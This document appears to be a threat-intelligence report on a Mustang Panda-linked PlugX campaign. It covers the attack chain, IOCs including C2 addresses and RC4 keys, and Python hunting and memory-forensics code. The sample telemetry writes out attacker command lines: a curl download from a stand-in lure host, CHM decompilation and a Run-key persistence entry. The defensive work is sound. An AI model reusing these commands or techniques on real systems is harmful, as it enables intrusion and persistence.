China-nexus Group Targets Persian Gulf Region | ThreatLabz

A China-nexus threat actor, assessed with medium confidence as Mustang Panda, targeted the Persian Gulf region using a multi-stage attack chain themed around the Middle East conflict. The campaign leverages LNK and CHM files to execute a heavily obfuscated shellcode loader via DLL sideloading, ultimately deploying a PlugX backdoor capable of HTTPS and DNS-over-HTTPS (DoH) C2 communications.

Sens: Immediate · Conf: high · Analyzed: 2026-03-13

Authors: SUDEEP SINGH, Zscaler Blog

Actors: Mustang Panda, PKPLUG, China-nexus threat actor, DOPLUGS campaign, PlugX, LOTUSLITE

Source:Zscaler ThreatLabz

Key Takeaways

  • A China-nexus threat actor (likely Mustang Panda) targeted Persian Gulf region countries using Middle East conflict lures.
  • The multi-stage attack chain utilizes LNK, CHM, and TAR files to deploy a PlugX backdoor variant.
  • The shellcode and PlugX backdoor employ heavy obfuscation, including Control Flow Flattening (CFF) and Mixed Boolean Arithmetic (MBA).
  • The PlugX variant supports HTTPS for C2 communication and DNS-over-HTTPS (DoH) for domain resolution.
  • The malware uses corrupted MZ/PE headers and reflective DLL injection to evade memory forensics.

Affected Systems

  • Windows

Attack Chain

The attack begins with a ZIP archive containing a malicious LNK file masquerading as a PDF. When executed, the LNK uses cURL to download a CHM file, which is decompiled using hh.exe to extract a decoy PDF, a second LNK, and a TAR archive. The second LNK extracts the TAR archive and executes a legitimate Baidu executable (ShellFolder.exe) to sideload a malicious DLL (ShellFolderDepend.dll). This DLL decrypts and executes heavily obfuscated shellcode (Shelter.ex), which reflectively loads a PlugX backdoor into memory after corrupting its own MZ/PE headers to evade memory forensics.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No

The article does not provide specific detection rules (YARA, Sigma, etc.), but details extensive behavioral indicators and IOCs for custom rule creation.

Detection Engineering Assessment

  • EDR Visibility: Medium. EDR can observe the initial LNK execution, the cURL download, the hh.exe decompilation, the ShellFolder.exe sideload and the reg.exe persistence. The reflective DLL injection and the deliberately corrupted MZ/PE headers, however, may evade memory scanners that rely on intact headers.
  • Network Visibility: Medium. Network telemetry can spot the CHM download and the HTTPS C2 session, but domain resolution over DNS-over-HTTPS (DoH) hides the lookups from passive DNS monitoring, and the RC4-encrypted C2 payloads travel inside TLS, so deep packet inspection yields little without decryption.
  • Detection Difficulty: Hard. The actor combines heavy obfuscation (CFF, MBA), reflective loading, memory forensics evasion (corrupted PE headers) and legitimate binaries (hh.exe, Baidu Netdisk's ShellFolder.exe) for proxy execution and sideloading.

Required Log Sources

  • Process Creation (Event ID 4688 / Sysmon 1)
  • File Creation (Sysmon 11)
  • Registry Modifications (Sysmon 12/13/14)
  • Network Connections (Sysmon 3)

Hunting Hypotheses

  • Hypothesis: LNK files executing cURL to download files, followed by hh.exe with the -decompile flag | Telemetry: Process Creation | ATT&CK Stage: Initial Access / Execution | FP Risk: Low
  • Hypothesis: ShellFolder.exe executing with the '--path a' argument, especially when launched from the AppData directory | Telemetry: Process Creation | ATT&CK Stage: Execution | FP Risk: Low
  • Hypothesis: reg.exe adding Run keys that point to executables in the AppData directory, particularly values named BaiNetdisk | Telemetry: Process Creation / Registry Modification | ATT&CK Stage: Persistence | FP Risk: Low
  • Hypothesis: Creation of a service named 'Microsoft Desktop Dialog Broker' or a registry key named 'DesktopDialogBroker' | Telemetry: Registry Modification / System Event Logs | ATT&CK Stage: Persistence | FP Risk: Low
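The four hypotheses above (and the Key Behavioral Indicators listed further down) translate directly into hunting logic over process-creation and registry telemetry. The following is an added example written for this page, not code from the Zscaler report: it applies each hypothesis to a handful of constructed Sysmon-style events. Hostnames, timestamps, the lure URL (example-lure.test) and the exact reg.exe command line are assumptions made for the example; the page gives the behaviours (curl then hh.exe -decompile, ShellFolder.exe --path a under AppData, a BaiNetdisk Run value, a DesktopDialogBroker service) but not these literal log records.

```python
"""Hunting logic for the four hypotheses, run over constructed Sysmon-style
events (invented for this example, not real telemetry). Field names follow
Sysmon Event ID 1 (process create), 12 (registry key create) and 13
(registry value set). Events are assumed to be in time order."""
import re
from datetime import datetime

# Constructed sample telemetry: WS01 shows the chain from the report; WS02 and
# WS03 carry benign look-alikes so the negatives are exercised too.
SAMPLE_EVENTS = [
    {"id": 1, "host": "WS02", "ts": "2026-03-10T08:55:00", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl -o C:\Temp\tool.zip https://intranet.example/tool.zip"},
    {"id": 1, "host": "WS01", "ts": "2026-03-10T09:00:00", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl -o C:\Users\u\AppData\Local\Temp\doc.chm https://www.example-lure.test/doc.chm"},
    {"id": 1, "host": "WS01", "ts": "2026-03-10T09:00:05", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\hh.exe",
     "CommandLine": r"hh.exe -decompile C:\Users\u\AppData\Local\Temp C:\Users\u\AppData\Local\Temp\doc.chm"},
    {"id": 1, "host": "WS01", "ts": "2026-03-10T09:00:20", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Users\u\AppData\Roaming\BaiduNetdisk\ShellFolder.exe",
     "CommandLine": "ShellFolder.exe --path a"},
    {"id": 1, "host": "WS01", "ts": "2026-03-10T09:00:25", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\reg.exe",   # assumed command line; the page names reg.exe and BaiNetdisk only
     "CommandLine": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v BaiNetdisk /t REG_SZ /d "C:\Users\u\AppData\Roaming\BaiduNetdisk\ShellFolder.exe --path a" /f'},
    {"id": 13, "host": "WS01", "ts": "2026-03-10T09:01:00",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\DesktopDialogBroker\DisplayName",
     "Details": "Microsoft Desktop Dialog Broker"},
    {"id": 1, "host": "WS03", "ts": "2026-03-10T09:05:00", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\hh.exe",
     "CommandLine": r"hh.exe C:\Program Files\VendorApp\help.chm"},        # benign: opens a help file
    {"id": 1, "host": "WS03", "ts": "2026-03-10T09:06:00", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Agent /t REG_SZ /d "C:\Program Files\VendorApp\agent.exe" /f'},
]

RUN_KEY = re.compile(r"(?i)\\currentversion\\run(\\|\s|$)")


def _base(path):
    return path.rsplit("\\", 1)[-1].lower()


def _ts(e):
    return datetime.fromisoformat(e["ts"])


def _in_appdata(s):
    return "\\appdata\\" in s.lower()


def rule_h1_curl_then_hh_decompile(events, window_s=300):
    """H1: hh.exe -decompile; records whether curl.exe ran on the same host
    within the preceding window (the LNK -> cURL -> CHM decompile sequence)."""
    hits, curl_seen = [], {}
    for i, e in enumerate(events):
        if e["id"] != 1:
            continue
        img = _base(e["Image"])
        if img == "curl.exe":
            curl_seen.setdefault(e["host"], []).append(_ts(e))
        elif img == "hh.exe" and re.search(r"(?i)(^|\s)-decompile(\s|$)", e["CommandLine"]):
            recent = any(0 <= (_ts(e) - t).total_seconds() <= window_s
                         for t in curl_seen.get(e["host"], []))
            hits.append({"rule": "H1", "event": i, "curl_preceded": recent})
    return hits


def rule_h2_shellfolder_path_a(events):
    """H2: ShellFolder.exe --path a; notes whether the image sits under AppData."""
    return [{"rule": "H2", "event": i, "from_appdata": _in_appdata(e["Image"])}
            for i, e in enumerate(events)
            if e["id"] == 1 and _base(e["Image"]) == "shellfolder.exe"
            and re.search(r"(?i)--path\s+a(\s|$)", e["CommandLine"])]


def rule_h3_run_key_to_appdata(events):
    """H3: Run-key persistence whose target lives in AppData, seen either on the
    reg.exe command line or as a Sysmon 13 value set under the Run key."""
    hits = []
    for i, e in enumerate(events):
        if e["id"] == 1 and _base(e["Image"]) == "reg.exe":
            cl = e["CommandLine"]
            if re.search(r"(?i)\badd\b", cl) and RUN_KEY.search(cl) and _in_appdata(cl):
                hits.append({"rule": "H3", "event": i, "bainetdisk": "bainetdisk" in cl.lower()})
        elif e["id"] == 13 and RUN_KEY.search(e["TargetObject"]) and _in_appdata(e.get("Details", "")):
            hits.append({"rule": "H3", "event": i, "bainetdisk": "bainetdisk" in e["TargetObject"].lower()})
    return hits


def rule_h4_dialog_broker_service(events):
    """H4: service key 'DesktopDialogBroker' or display name 'Microsoft Desktop Dialog Broker'."""
    hits = []
    for i, e in enumerate(events):
        if e["id"] not in (12, 13):
            continue
        key_hit = re.search(r"(?i)\\services\\desktopdialogbroker(\\|$)", e["TargetObject"])
        name_hit = "microsoft desktop dialog broker" in e.get("Details", "").lower()
        if key_hit or name_hit:
            hits.append({"rule": "H4", "event": i})
    return hits


def hunt(events):
    """Run every hypothesis and return the hits ordered by event index."""
    hits = []
    for rule in (rule_h1_curl_then_hh_decompile, rule_h2_shellfolder_path_a,
                 rule_h3_run_key_to_appdata, rule_h4_dialog_broker_service):
        hits.extend(rule(events))
    return sorted(hits, key=lambda h: h["event"])


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

Only the WS01 events fire: the benign hh.exe invocation lacks -decompile, and the benign Run value points into Program Files rather than AppData. The H1 rule deliberately reports hh.exe -decompile on its own and only annotates whether cURL preceded it, so a decompile without a visible download (for example, when the CHM arrived by another route) still surfaces for triage.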

Control Gaps

  • Memory forensics tools relying on intact MZ/PE headers
  • Network inspection tools unable to decrypt DoH traffic
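The first control gap is worth making concrete. A scanner that identifies loaded modules by their 'MZ' and 'PE\0\0' magic returns nothing once those bytes are wiped, yet structure further into the image usually survives. The following is an added example written for this page, not code from the report: it builds a constructed, headers-only PE image, damages the DOS header and PE signature (the exact way the shellcode corrupts its headers is not described on the page; this wipe is an assumption), and contrasts a signature-dependent parse with a heuristic that looks for the DOS stub string and a run of well-formed section headers instead.

```python
"""Why header-dependent memory forensics misses a reflectively loaded PE whose
MZ/PE headers were wiped, and one heuristic that does not need them.
The sample image is constructed for this example (no real code in it)."""
import struct

DOS_STUB = b"This program cannot be run in DOS mode."
KNOWN_SECTIONS = (b".text", b".rdata", b".data", b".pdata", b".rsrc", b".reloc")


def build_minimal_pe():
    """Constructed sample: DOS header + stub string, PE32+ COFF header,
    240-byte optional header and a three-entry section table (512 bytes total)."""
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)               # e_lfanew -> PE signature
    dos[0x40:0x40 + len(DOS_STUB)] = DOS_STUB
    sections = [(b".text", 0x1000, 0x2000), (b".rdata", 0x3000, 0x800), (b".data", 0x4000, 0x400)]
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, 0xF0, 0x22)
    opt = bytearray(0xF0)
    struct.pack_into("<H", opt, 0, 0x20B)                 # PE32+ optional-header magic
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), size, va, size,
                    0x400 * (i + 1), 0, 0, 0, 0, 0x60000020)
        for i, (name, va, size) in enumerate(sections))
    return bytes(dos) + coff + bytes(opt) + table


def corrupt_headers(image):
    """Assumed damage for the example: zero the DOS header fields and the PE
    signature plus COFF header; stub string and section table are left intact."""
    buf = bytearray(image)
    buf[0:0x40] = bytes(0x40)
    buf[0x80:0x98] = bytes(0x18)
    return bytes(buf)


def parse_pe_headers(buf):
    """Signature-dependent parse, as a naive module scanner does.
    Returns NumberOfSections, or None when the MZ/PE magic is missing."""
    if len(buf) < 0x40 or buf[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    if e_lfanew + 24 > len(buf) or buf[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    return struct.unpack_from("<H", buf, e_lfanew + 6)[0]


def find_section_table(buf, max_offset=0x1000):
    """Locate a run of 40-byte IMAGE_SECTION_HEADERs with known names and strictly
    ascending VirtualAddress values. Returns (offset, [names]) or None."""
    for off in range(0, min(len(buf), max_offset) - 40):
        names, prev_va, pos = [], -1, off
        while pos + 40 <= len(buf):
            name = buf[pos:pos + 8].rstrip(b"\0")
            va = struct.unpack_from("<I", buf, pos + 12)[0]
            if name not in KNOWN_SECTIONS or va <= prev_va:
                break
            names.append(name)
            prev_va, pos = va, pos + 40
        if len(names) >= 2:
            return off, names
    return None


def headerless_pe_score(buf):
    """Indicators that survive the header wipe: the DOS stub string and a
    well-formed section table. Returns (score, details)."""
    table = find_section_table(buf)
    details = {"dos_stub": DOS_STUB in buf[:0x400],
               "sections": table[1] if table else []}
    return int(details["dos_stub"]) + len(details["sections"]), details


if __name__ == "__main__":
    clean, damaged = build_minimal_pe(), corrupt_headers(build_minimal_pe())
    print("signature parse:", parse_pe_headers(clean), parse_pe_headers(damaged))
    print("heuristic on damaged image:", headerless_pe_score(damaged))
```

On the damaged image the signature parse returns None while the heuristic still recovers the three section names and the stub string. In practice such a heuristic is applied to private, executable memory regions that are not backed by a file on disk, which is also where a reflectively loaded PlugX payload would sit.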

Key Behavioral Indicators

  • hh.exe -decompile execution
  • ShellFolder.exe --path a execution
  • BaiNetdisk Run key creation
  • Corrupted MZ/PE headers in memory

False Positive Assessment

  • Low

Recommendations

Immediate Mitigation

  • Block the identified C2 IP (91.193.17.117) and CHM download domain (www.360printsol.com).
  • Search endpoints for the presence of ShellFolderDepend.dll and Shelter.ex in AppData.

Infrastructure Hardening

  • Restrict the execution of hh.exe (HTML Help) if not required for business operations.
  • Implement application control to block unauthorized binaries from executing in %AppData%.

User Protection

  • Configure email gateways to block or quarantine ZIP archives containing LNK files.
  • Deploy EDR solutions configured to detect DLL sideloading and reflective code loading.

Security Awareness

  • Train users to identify suspicious LNK files masquerading as PDFs.
  • Warn employees about social engineering lures related to geopolitical events, specifically the Middle East conflict.

MITRE ATT&CK Mapping

  • T1587.001 - Resource Development: Develop Capabilities: Malware
  • T1588.001 - Resource Development: Obtain Capabilities: Malware
  • T1608.001 - Resource Development: Stage Capabilities: Upload Malware
  • T1566 - Initial Access: Phishing
  • T1204.002 - Execution: User Execution: Malicious File
  • T1059.003 - Execution: Command and Scripting Interpreter: Windows Command Shell
  • T1106 - Execution: Native API
  • T1547.001 - Persistence: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
  • T1543.003 - Persistence: Create or Modify System Process: Windows Service
  • T1548.002 - Privilege Escalation: Abuse Elevation Control Mechanism: Bypass User Account Control
  • T1036.007 - Defense Evasion: Masquerading: Double File Extension
  • T1036.005 - Defense Evasion: Masquerading: Match Legitimate Resource Name or Location
  • T1140 - Defense Evasion: Deobfuscate/Decode Files or Information
  • T1036.004 - Defense Evasion: Masquerading: Masquerade Task or Service
  • T1218.001 - Defense Evasion: System Binary Proxy Execution: Compiled HTML File
  • T1620 - Defense Evasion: Reflective Code Loading
  • T1574.001 - Defense Evasion: Hijack Execution Flow: DLL
  • T1027 - Defense Evasion: Obfuscated Files or Information
  • T1027.002 - Defense Evasion: Obfuscated Files or Information: Software Packing
  • T1027.007 - Defense Evasion: Obfuscated Files or Information: Dynamic API Resolution
  • T1027.009 - Defense Evasion: Obfuscated Files or Information: Embedded Payloads
  • T1027.013 - Defense Evasion: Obfuscated Files or Information: Encrypted/Encoded File
  • T1027.015 - Defense Evasion: Obfuscated Files or Information: Compression
  • T1027.016 - Defense Evasion: Obfuscated Files or Information: Junk Code Insertion
  • T1082 - Discovery: System Information Discovery
  • T1518.001 - Discovery: Software Discovery: Security Software Discovery
  • T1083 - Discovery: File and Directory Discovery
  • T1071.001 - Command and Control: Application Layer Protocol: Web Protocols
  • T1572 - Command and Control: Protocol Tunneling
  • T1090.001 - Command and Control: Proxy: Internal Proxy
  • T1573.001 - Command and Control: Encrypted Channel: Symmetric Cryptography
  • T1573.002 - Command and Control: Encrypted Channel: Asymmetric Cryptography
  • T1095 - Command and Control: Non-Application Layer Protocol
  • T1105 - Command and Control: Ingress Tool Transfer

Additional IOCs

  • Domains:
    • www[.]360printsol[.]com - Domain hosting the malicious CHM file.
  • Urls:
    • hxxps://91[.]193[.]17[.]117:443 - PlugX C2 URL.
  • Registry Keys:
    • DesktopDialogBroker - PlugX registry name used for persistence.
  • File Paths:
    • %AppData%\BaiduNetdisk\ShellFolder.exe - Path of the legitimate Baidu executable used for DLL sideloading.
    • %ProgramFiles%\Microsoft\Display Broker - Persistence path used by the PlugX backdoor.
  • Command Lines:
    • Purpose: Download malicious CHM file and extract contents | Tools: curl.exe, hh.exe | Stage: Initial Access / Execution | hh.exe -decompile
    • Purpose: Establish persistence via Run key | Tools: reg.exe | Stage: Persistence
    • Purpose: Execute sideloading host binary | Tools: ShellFolder.exe | Stage: Execution | ShellFolder.exe --path a
  • Other:
    • Microsoft Desktop Dialog Broker - Malicious service display name used by PlugX.
    • VD*1^N1OCLtAGM$U - PlugX C2 Traffic RC4 Key.
    • qwedfgx202211 - PlugX Configuration RC4 Key.
    • 20260301@@@ - Shellcode loader RC4 Key.